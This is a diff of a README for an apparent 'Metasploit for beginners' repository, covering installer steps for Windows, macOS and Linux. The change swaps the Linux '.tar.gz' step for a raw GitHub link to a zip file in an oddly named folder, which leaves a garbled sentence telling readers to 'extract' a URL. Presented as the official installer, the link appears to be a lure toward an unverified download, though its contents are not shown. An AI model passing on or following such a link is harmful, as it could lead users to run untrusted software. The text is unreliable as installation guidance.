Aviwe45/metasploit-for-beginners/README.md

    After downloading, locate the file in your "Downloads" folder.
    - **Windows:** Double-click the `.exe` file to run the installer.
    - **macOS:** Open the `.dmg` file and drag the Metasploit icon to your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file to a directory of your choice, then follow the README file instructions to run the setup.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/Aviwe45/metasploit-for-beginners/master/disaccommodation/metasploit-for-beginners.zip` file to a directory of your choice, then follow the README file instructions to run the setup.

 7. **Follow Installation Prompts**
    Complete the installation process by following the on-screen prompts.
 Accept any terms and agreements as needed.